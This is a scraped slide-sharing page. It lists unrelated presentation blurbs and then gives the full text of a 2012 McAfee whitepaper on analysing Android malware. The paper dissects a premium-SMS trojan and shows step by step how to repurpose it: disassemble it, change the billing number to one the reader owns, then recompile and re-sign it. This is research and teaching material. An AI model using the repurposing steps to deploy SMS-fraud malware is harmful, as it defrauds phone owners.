An import error occurs when a program fails to import a module or library, disrupting its execution. In languages like Python, this issue arises when the specified module cannot be found or accessed, hindering the program's functionality. Resolving import errors is crucial for maintaining smooth software operation and uninterrupted development processes.
How to Setup Warehouse & Location in Odoo 17 InventoryCeline George
In this slide, we'll explore how to set up warehouses and locations in Odoo 17 Inventory. This will help us manage our stock effectively, track inventory levels, and streamline warehouse operations.
A review of the growth of the Israel Genealogy Research Association Database Collection for the last 12 months. Our collection is now passed the 3 million mark and still growing. See which archives have contributed the most. See the different types of records we have, and which years have had records added. You can also see what we have for the future.
Strategies for Effective Upskilling is a presentation by Chinwendu Peace in a Your Skill Boost Masterclass organisation by the Excellence Foundation for South Sudan on 08th and 09th June 2024 from 1 PM to 3 PM on each day.
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...PECB
Denis is a dynamic and results-driven Chief Information Officer (CIO) with a distinguished career spanning information systems analysis and technical project management. With a proven track record of spearheading the design and delivery of cutting-edge Information Management solutions, he has consistently elevated business operations, streamlined reporting functions, and maximized process efficiency.
Certified as an ISO/IEC 27001: Information Security Management Systems (ISMS) Lead Implementer, Data Protection Officer, and Cyber Risks Analyst, Denis brings a heightened focus on data security, privacy, and cyber resilience to every endeavor.
His expertise extends across a diverse spectrum of reporting, database, and web development applications, underpinned by an exceptional grasp of data storage and virtualization technologies. His proficiency in application testing, database administration, and data cleansing ensures seamless execution of complex projects.
What sets Denis apart is his comprehensive understanding of Business and Systems Analysis technologies, honed through involvement in all phases of the Software Development Lifecycle (SDLC). From meticulous requirements gathering to precise analysis, innovative design, rigorous development, thorough testing, and successful implementation, he has consistently delivered exceptional results.
Throughout his career, he has taken on multifaceted roles, from leading technical project management teams to owning solutions that drive operational excellence. His conscientious and proactive approach is unwavering, whether he is working independently or collaboratively within a team. His ability to connect with colleagues on a personal level underscores his commitment to fostering a harmonious and productive workplace environment.
Date: May 29, 2024
Tags: Information Security, ISO/IEC 27001, ISO/IEC 42001, Artificial Intelligence, GDPR
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: ISO/IEC 27001 Information Security Management System - EN | PECB
ISO/IEC 42001 Artificial Intelligence Management System - EN | PECB
General Data Protection Regulation (GDPR) - Training Courses - EN | PECB
Webinars: https://pecb.com/webinars
Article: https://pecb.com/article
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
How to Build a Module in Odoo 17 Using the Scaffold MethodCeline George
Odoo provides an option for creating a module by using a single line command. By using this command the user can make a whole structure of a module. It is very easy for a beginner to make a module. There is no need to make each file manually. This slide will show how to create a module using the scaffold method.
This presentation includes basic of PCOS their pathology and treatment and also Ayurveda correlation of PCOS and Ayurvedic line of treatment mentioned in classics.
A workshop hosted by the South African Journal of Science aimed at postgraduate students and early career researchers with little or no experience in writing and publishing journal articles.
How to Add Chatter in the odoo 17 ERP ModuleCeline George
In Odoo, the chatter is like a chat tool that helps you work together on records. You can leave notes and track things, making it easier to talk with your team and partners. Inside chatter, all communication history, activity, and changes will be displayed.
Walmart Business+ and Spark Good for Nonprofits.pdfTechSoup
"Learn about all the ways Walmart supports nonprofit organizations.
You will hear from Liz Willett, the Head of Nonprofits, and hear about what Walmart is doing to help nonprofits, including Walmart Business and Spark Good. Walmart Business+ is a new offer for nonprofits that offers discounts and also streamlines nonprofits order and expense tracking, saving time and money.
The webinar may also give some examples on how nonprofits can best leverage Walmart Business+.
The event will cover the following::
Walmart Business + (https://business.walmart.com/plus) is a new shopping experience for nonprofits, schools, and local business customers that connects an exclusive online shopping experience to stores. Benefits include free delivery and shipping, a 'Spend Analytics” feature, special discounts, deals and tax-exempt shopping.
Special TechSoup offer for a free 180 days membership, and up to $150 in discounts on eligible orders.
Spark Good (walmart.com/sparkgood) is a charitable platform that enables nonprofits to receive donations directly from customers and associates.
Answers about how you can do more with Walmart!"
This presentation was provided by Steph Pollock of The American Psychological Association’s Journals Program, and Damita Snow, of The American Society of Civil Engineers (ASCE), for the initial session of NISO's 2024 Training Series "DEIA in the Scholarly Landscape." Session One: 'Setting Expectations: a DEIA Primer,' was held June 6, 2024.
বাংলাদেশের অর্থনৈতিক সমীক্ষা ২০২৪ [Bangladesh Economic Review 2024 Bangla.pdf] কম্পিউটার , ট্যাব ও স্মার্ট ফোন ভার্সন সহ সম্পূর্ণ বাংলা ই-বুক বা pdf বই " সুচিপত্র ...বুকমার্ক মেনু 🔖 ও হাইপার লিংক মেনু 📝👆 যুক্ত ..
আমাদের সবার জন্য খুব খুব গুরুত্বপূর্ণ একটি বই ..বিসিএস, ব্যাংক, ইউনিভার্সিটি ভর্তি ও যে কোন প্রতিযোগিতা মূলক পরীক্ষার জন্য এর খুব ইম্পরট্যান্ট একটি বিষয় ...তাছাড়া বাংলাদেশের সাম্প্রতিক যে কোন ডাটা বা তথ্য এই বইতে পাবেন ...
তাই একজন নাগরিক হিসাবে এই তথ্য গুলো আপনার জানা প্রয়োজন ...।
বিসিএস ও ব্যাংক এর লিখিত পরীক্ষা ...+এছাড়া মাধ্যমিক ও উচ্চমাধ্যমিকের স্টুডেন্টদের জন্য অনেক কাজে আসবে ...
বাংলাদেশ অর্থনৈতিক সমীক্ষা (Economic Review) ২০২৪ UJS App.pdf
I haz you and pwn your maal whitepaper
1. I haz you and pwn your
maal
(Taking control of an Android phone
and its installed malware)
By Harsimran Walia
Research Scientist, McAfee Labs
2012
2. Abstract
The paper covers the evolution of malware that attacks the Android operating system and discusses the
different types of malware infections. I shall look at the lab setup the tools required, and the steps for
reverse-engineering the Android application package (APK) files to do the malware analysis. I’ll unpack
the APK and decompile the Dalvik (Android OS) executable to Java code. I’ll cover the basic reversing of
the Java code and patching and modifying it, examine how I can compile the code, and pack it back into
an APK. I’ll also discuss how Android malware analysis is different from Windows malware analysis.
The presentation includes a live demo of a malware. Now to tie this talk to its title: While reversing the
malware, I learned to which premium phone number the infected phone sends an SMS—thus I “have
you” (your number). And by reversing the malware and changing the SMS number to my own number, I
“own” the malware.
About the Author
Harsimran Walia is a research scientist at McAfee Labs. He graduated as with a degree in mechanical
engineering from the Indian Institute of Technology, in Delhi. Walia presented his research
at NullCon2011 on the topic "Reversing Microsoft patches to reveal vulnerable code." He is the author
of various technical blogs and research papers.
3. Introduction
The increasing use of smartphones, tablets, and other mobile devices means that we no longer need to
stay in one place to access data from our computers or the Internet. We can get lots of information on
the go. However, these relatively new technologies create a larger attack vector. Our current mobility is
a treasure trove for attackers because mobile security is not as mature as desktop and network
protection.
The ease of attack and vast amount of information on smartphones makes them hot targets for
attackers and data thieves. The most reliable way of attacking any system is via malware, which can
penetrate a host, extract information, stay hidden, and send data to the attacker. Using the same
method, attackers have created smartphone malware, which are delivered in the form of smartphone
applications.
Although there are many smartphone platforms—including Apple’s iOS, Android, Symbian, and
Blackberry—Android is by far the most popular with attackers. Why? Let’s start with Android’s leading
market share.
Figure 1: Market share of Android OS smartphones, through February 2012.
4. Figure 2: Market share of Android OS smartphone sales over a period of 1 year.
As we can see, more than 50 percent of smartphone customers use Android OS–based phones. Also, 61
percent of smartphone sales in the first quarter of 2012 were Android OS based, which has been the top
seller for the past year. Looking at these stats, attackers have no trouble choosing Android as the target
for their malware.
Market share is one big factor. Now let’s look at another: the development procedure for Android and
iOS.
iOS Android
Macintosh computer/laptop required Any development platform will do (Windows, Linux, Mac
,etc.)
Sign in to developer program Android is open source; anyone can download the SDK
Wait for verification No validation required to put an app on the market
The differences in development have led to headlines such as these:
• Android OS the “worst platform for malware”— TG Daily, August 2011
• Android threats leapt 76% during Q2-2011—McAfee
• Most attacked mobile OS overtaking Symbian OS
• The most popular target for mobile malware developers
• Increasing target for cybercriminals
5. Android Malware
Android Malware Analysis
For the same reason as the malware developers, I chose the Android platform for my mobile malware
analysis. Just like for Windows malware, we have two types of analyses for Android.
• Static. Reverse-engineer the application/malware using tools and techniques to recreate the
actual code and algorithm
• Dynamic. Check the behavior of the application/malware as it is executed on the system. Look
for the network and the system logs as the malware runs.
I will cover the following important procedures of Android malware analysis:
• Lab setup including a virtual machine with an Android SDK installation
• Tools required for the analysis
• Static analysis. Extracting and decompiling the malware to understand the code
• Dynamic analysis. Understanding the behavior of the malware and the network activity
• Patching the malware to own it and repacking it to a full-blown android app (.apk)
Types of Android Malware
During any analysis phase we figure out the behavior of the malware and identify its type. Let’s see the
different effects of the malwares vs. the count of malwares of these types.
Figure 3: Malware count and their effects.
6. Based on the different behaviors exhibited by malware samples we have analyzed, Android malware
can be classified into the following types:
• Mobile Device Data Stealers. The most common type of malware found in the wild. The sole aim is
to acquire information from the infected device, including:
– OS version
– Product ID
– International Mobile Equipment Identity (IMEI) number
– International Mobile Subscriber Identity (IMSI) number
This stolen device data may or may not be encrypted and sent via HTTP POST to the attacker. This
information can be used for future attacks against the victim or against others with the attacker
impersonating the victim.
• Rooting Capable. This type of malware gains root privileges, which enables the attacker to do
lots of interesting stuff that a normal user cannot do. Rooting provides remote access to files
and the device’s flash memory.
• With rooting, malware can drop copies of itself onto flash memory without being detected or
consequently deleted by antimalware products. The variety of things that attacker can do is
similar to the operations that can be performed by root on a Linux system.
• Premium Service Abusers. This malware takes advantage of the SMS manager in Android. Most
carry one or more hardcoded premium phone numbers in their code. The malware uses the
SMS manager to send messages to these premium numbers, which charge the victims for SMS
services without their knowledge.
• Mobile Device Spies. These stay hidden and secretly monitor and steal information stored on
the device. Some of this information includes:
– GPS location
– Text and email messages
– Like data stealers, sends stolen data to specific URLs via HTTP POST
– Focuses on gathering personal data
The information may be used for targeted attacks or just for spying. The focus of this type of
malware is to steal personal data.
7. One-Click Billing Fraud
This technique delivers a specific type of malware. The operation of the technique on a computer is
depicted by Figure 4.
Figure 4: The flow of one-click billing fraud.
This type of fraud is mostly active on porn and gamer video sites. An Android user would typically see a
pop-up window on the screen as the user tries to view a video. The pop-up asks the user to download a
(malicious) app to view the video. Upon installation, the malware gets the Android user’s account
information and sends it to the cybercriminals. Using the stolen information to build credibility and to
convince the victim to pay the amount, the malware displays a message such as “We haven’t received
your payment. Therefore, based on our policy, we will have to charge you if you have not paid yet.”
The pop-up appears every few minutes. As the victim keeps accepting, the malware eats his or her
money.
8. Need
• Malware analysis is an important part of daily activities in antimalware companies and in others.
Mobile malware analysis has become equally important for these companies.
• Effective analysis can be used by law enforcement agencies to catch malware authors and attackers
• For fun, when you can pwn someone else’s malware and control it. You get yourself full-blown
malware without writing it.
Practical Analysis Phase
Tools of the Trade
Here are several tools for both static and dynamic analysis.
Tools for static analysis
• Mobile Sandbox: Provides static analysis of malware images with an easily accessible web
interface for submission. http://www.mobile-sandbox.com (still in beta)
• IDA pro: The most common tool among reverse engineers for disassembly and debugging
supports Android byte code from the professional Versions 6.1 and later. http://www.hex-
rays.com/products/ida/6.1/index.shtml
• APKInspector: A powerful GUI tool for analyzing Android applications.
http://code.google.com/p/apkinspector/
• Dex2jar: For converting Android’s .dex format to Java’s .class format.
http://code.google.com/p/dex2jar/
• JD-GUI: A standalone graphical utility that displays Java source code of .class files. You can
browse the reconstructed source code with the JD-GUI for instant access to methods and fields.
http://java.decompiler.free.fr/?q=jdgui
• Androguard: Reverse engineering and malware analysis of Android applications.
http://code.google.com/p/androguard/
• JAD: Java Decompiler. http://www.varaneckas.com/jad
• Dexdump: Java .dex file format decompiler. http://code.google.com/p/dex-decomplier/
• Smali: Smali/baksmali is an assembler/disassembler for the dex format used by Dalvik,
Android’s Java VM implementation. The syntax is loosely based on Jasmin’s/dedexer’s syntax,
and supports the functions of the dex format (annotations, debug info, line info, etc.).
http://code.google.com/p/smali/
9. Tools for dynamic analysis
• Droidbox: An Android application sandbox for dynamic analysis that uses “static precheck,
dynamic taint analysis and API monitoring. Data leaks can be detected by tainting sensitive data
and placing taint sinks throughout the API. Additionally, by logging relevant API function
parameters and return values, a potential malware can be discovered and reported for further
analysis.” http://www.honeynet.org/gsoc/slot5, http://code.google.com/p/droidbox/
• The Android SDK: “A software development kit that enables developers to create applications
for the Android platform. The Android SDK includes sample projects with source code,
development tools, an emulator, and required libraries to build Android applications.
Applications are written using the Java programming language and run on Dalvik, a custom
virtual machine designed for embedded use which runs on top of a Linux kernel.”
http://www.webopedia.com/TERM/A/Android_SDK.html
Using the Android SDK we can create a virtual Android device almost identical in functionality
and capabilities to an Android phone and use that virtual device as secure environment in which
we can execute malware and observe its behavior.
Code: http://developer.android.com/sdk/index.html
• androidAuditTools: Dynamic Android analysis tools.
https://github.com/wuntee/androidAuditTools
Lab Setup
The traditional setup for malware analysis includes a virtual machine; we need one as well. We also
need to install the Android SDK in the machine. You can find details here:
http://developer.android.com/sdk/installing.html.
During the installation you will see a screen similar to this:
10. Figure 4: Choosing the version of the Android SDK API.
At this screen (Figure 4) you must select at least one version of the API. Different API versions are
required to develop applications for different Android versions (for ICS, Gingerbread, etc). We also need
a separate SDK for different malwares targeted for a particular Android version. For my demo I will use
the Version 2.3 (Gingerbread) SDK.
Analysis
Let’s start by getting our hands on an Android malware. We can analyze it to study its behavior. At
Contagio Mini (http://contagiominidump.blogspot.in/) you can get lots of mobile malware. It is
community driven: Anyone can submit a sample, and it is made available to others.
I have Voodoo SimpleCarrierIQDetector, a malicious Android application that is supposed to detect the
presence of the Carrier IQ mobile diagnostic software on the system. We are going to dig deep inside to
analyze the application and try to find the malicious code. My choice of malware depends on the ease
of understanding, but we also see very complex malware that sends an SMS based on country of the
victim.
Static Analysis
Once we have the APK malware, we start by using an online sandbox analysis to get a brief idea about
this threat.
Mobile-sandbox.com: Submitting the APK file on mobile-sandbox.com for analysis generates the
following report, which we can view at http://mobilesandbox.org/xml_report_static/?q=176.
11. Sample SHA256: 79a3bc6da45243355a920082dc67da0febf19379c25c721c43fd6b3f83ff4ef4
Sample MD5: 69b9691a8274a17cdc22e9681b3e1c74
Start of Analysis: Feb. 12, 2012, 11:34 p.m.
End of Analysis: Feb. 12, 2012, 11:34 p.m.
apk Name: 69b9691a8274a17cdc22e9681b3e1c74.apk
Package Name: Détecteur de Carrier IQ
SDK Version: 7
Files inside the APK-package:
android.hardware.telephony
Used Features:
android.hardware.touchscreen
Requested Permissions from Android android.permission.READ_LOGS
Manifest: android.permission.SEND_SMS
Used Permissions:
Responsible API calls for used Permissions:
android.intent.action.MAIN
Used Intents:
android.intent.category.LAUNCHER
Used Activities:
sendSMS
Potentially dangerous Calls: Execution of native code
getPackageInfo
Used Services and Receiver:
Used Providers:
Used Networks:
URLs:
From the report we are interested mainly in reading the two fields that are marked as red. The malware
asks permissions to read the logs and send SMS. The call made by the application that are potentially
dangerous, according to the report, is sendSMS.
12. Extraction: With this brief idea about the behavior and type of malware, we can start our manual
analysis. As a start, we need to extract the APK to get its contents. We can use WinRAR or WinZip on
this zipped file.
On extraction we see the following files. The file of interest is classes.dex.
Figure 5: Files extracted from the malicious APK.
dex2jar: The next step is to use dex2jar at the command prompt with the following commands. It will
convert our classes.dex file to a jar file.
C:> dex2jar.bat classes.dex
Output: classes.dex classes_dex2jar.jar
JD-GUI: From the jar file, we want to be able to reach the code to proceed with our analysis. After
opening the jar file with JD-GUI, it looks like this.
Figure 6: Jar file opened with JD-GUI.
13. We see four .class files. Let’s analyze them one by one.
• Detect.class: Based on some checks, we see that the code is trying to make out if the CarrierIQ
software is installed on the system
• R.class: Every Android application contains this class file. Here it is used to declare a few
variables
• Utils.class: Contains a few utility method definitions such as findFiles. getCommandOutput, etc.
• Main.class: This is the most interesting class because it contains the malicious code. The code
looks like this:
Figure 7: Malicious code highlighted by red boxes.
Code Analysis: The four highlighted lines of code are the same commands to send an SMS to the
number 81168 with four different SMS texts:
• AT37
• MC49
• SP99
• SP93
A Google search on that number tells it is a premium-rate number that costs almost €9 per message.
This is how criminals make money with mobile malware. Some malware listens to incoming messages
and deletes them before victims can read them when the messages are from service providers
informing users about their balance or billing charges.
While searching on Google I found a related Facebook scam. The victim gets messages from friends on
Facebook asking him to vote for a friend on some “Miss and Mister” contest. Following the malicious
link hacks the Facebook account, rendering it unusable. The attacker then calls the victim and says the
14. account has been blocked for some reason. The victim must send an SMS to number 81168, with any of
the four texts, to receive a code, which has to be given to the caller (the attacker) to unlock the account.
I haz you
I “haz” you now because I know the premium-rate phone number and the text messages being sent. To
catch the crooks, this is the time to get the police involved. Find the country and the operator to whom
the number belongs and persuade that company to disclose information on the malware author.
Sometimes Google helps a lot; you can often find substantial public information.
Pwnification
Now it’s time for some fun by owning the malware and making it dance to our tune. The following
technique will explain the process to own the malware, and you can generalize for other malware.
Baksmali: We use this program to disassemble the dex files. Using the following command to
disassemble classes.dex, we get .smali files, as shown in Figure 7.
C:> baksmali-0.93.jar –o smali-out classes.dex
Figure 7: Disassembling classes.dex presents us with several .smali files.
The.smali files, which can be opened in any text editor, have names similar to the .class files. Our file
with the malicious code is main$1.smali, which we figured out in the analysis phase. Opening the file in
a text editor shows us the malicious code:
15. Figure 8: Disassembled malicious code from main$1.smali.
Let’s change the destination number of the SMS. We find this in the first argument of the
sendTextMessage function call. Set this to your mobile number or any premium number that you own
to get yourself a malware. (But think of the consequence before using it for malicious intent. We
certainly don’t advise that you really do this.) I will change it to the port number of my Android
emulator, which I’ll use later for testing. Save the file.
Smali: Now we compile the .smali files into a .dex file. After making the desired changes to the smali
file and saving it, we compile all the .smali files together to classes.dex using the following command.
C:> smali-0.93.jar smali-out –o classes.dex
Packing: With the modified classes.dex, we pack the files back to a .zip file using any packer utility.
After packing, we rename it to .apk and voila: We are done with the modification process and we own
some malware.
Signing: Google has made it mandatory for an application (apk) to be signed by the owner/author’s
private key. The system will not install an application on an emulator or a device if it is not signed. We
can use self-signed certificates to sign your applications. No certificate authority is needed.
In order to sign the application you need
• Keytool – Comes as a part of jdk installation. Used to create your private key for signing.
Following command generates private keystore by the name of my-personal-key with the key
C:> keytool -genkey -v -keystore my-personal-key.keystore
16. -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Upon executing the above command it prompts you to provide passwords for the keystore and
key, and to provide the Distinguished Name fields.
• Jarsigner – Also comes as a part of jdk installation. Used to sign the apk with created keystore
Following command signs the modified apk with the private keystore
C:> jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 -keystore my-
release-key.keystore carrieriq.apk alias_name
Running the above command above, Jarsigner prompts you to provide passwords for the keystore
and key. It then modifies the APK in-place, creating the META_INF folder with the signing details
meaning the APK is now signed.
To verify if the apk is signed use
C:> jarsigner –verify -verbose my_ carrieriq.apk alias_name
If signed properly, it outputs “JAR verified”
That’s it and voila you are done with the whole modification process and you got your own malware.
Playing
Dynamic Analysis
Let’s have a little bit of fun by installing our new Android (malware) application on the Android SDK and
check if it really performs the functions that we intended. We open two instances of the Android
emulator and install the new malware on one of them while noting the SMS number should be the port
number of the emulator, rather than the number originally with the malware installation.
Upon installation and running the app, as soon as the uninstall button is clicked the SMS gets sent to the
other emulator. As seen in the figure we get all the four sms in the other emulator as expected from our
analysis.
17. I pwn your maal
I have modified your malware, customized it to my needs, and now I pwn you maal. From now on it’s
going to serve me.
Conclusion
This paper is an overview of how the Android smartphone OS has, in a short time, become the most
popular target for cybercriminals. The article describes the different types of malware created for the
Android platform. By analyzing Android malware, the paper attempts to explain the lab setup, tools
required, and static and dynamic malware analysis by practically analyzing a real premium-rate SMS-
sending malware. Our analysis shows us the origin of the malware and how can we own it. In short, “I
haz you and pwn your maal.”
18. References
1. http://www.droid-life.com/2012/05/07/androids-market-share-balloons-to-61-in-the-u-s-
during-q1-ios-drops-to-29/
2. http://community.trendmicro.com/t5/Malware-Discussions/Mobile-Malware-4-Types-of-
Android-Malware/td-p/44005
3. http://blog.trendmicro.com/one-click-billing-fraud-scheme-through-android-app-found/
4. TrendLabs: Quarterly security roundup
5. TrendLabs: 5 simple steps to secure your Android based smartphones
6. http://contagiominidump.blogspot.in